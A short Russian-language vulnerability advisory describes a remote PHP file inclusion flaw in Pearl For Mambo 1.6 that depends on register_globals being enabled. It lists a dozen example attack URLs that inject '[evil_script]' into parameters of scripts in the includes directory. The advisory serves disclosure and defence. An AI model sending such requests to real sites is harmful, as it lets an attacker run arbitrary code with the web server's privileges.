Программа: Pearl For Mambo 1.6, возможно другие версии.

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре "GlobalSettings[templatesDirectory]" в различных сценариях в каталоге "includes". Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Для удачной эксплуатации уязвимости опция "register_globals" должна быть включена в конфигурационном файле PHP.

Пример:

http://victim/[path]/includes/functions_cms.php?phpbb_root_path=[evil_script]
http://victim/[path]/includes/adminSensored.php?GlobalSettings[templatesDirectory]=[evil_script]
http://victim/[path]/includes/adminBoards.php?GlobalSettings[templatesDirectory]=[evil_script]
http://victim/[path]/includes/adminAttachments.php?GlobalSettings[templatesDirectory]=[evil_script]
http://victim/[path]/includes/adminAvatars.php?GlobalSettings[templatesDirectory]=[evil_script]
http://victim/[path]/includes/adminBackupdatabase.php?GlobalSettings[templatesDirectory]=[evil_script]
http://victim/[path]/includes/adminBanned.php?GlobalSettings[templatesDirectory]=[evil_script]
http://victim/[path]/includes/adminForums.php?GlobalSettings[templatesDirectory]=[evil_script]
http://victim/[path]/includes/adminPolls.php?GlobalSettings[templatesDirectory]=[evil_script]
http://victim/[path]/includes/adminSmileys.php?GlobalSettings[templatesDirectory]=[evil_script]
http://victim/[path]/includes/poll.php?GlobalSettings[templatesDirectory]=[evil_script]
http://victim/[path]/includes/move.php?GlobalSettings[templatesDirectory]=[evil_script]

Оставить мнение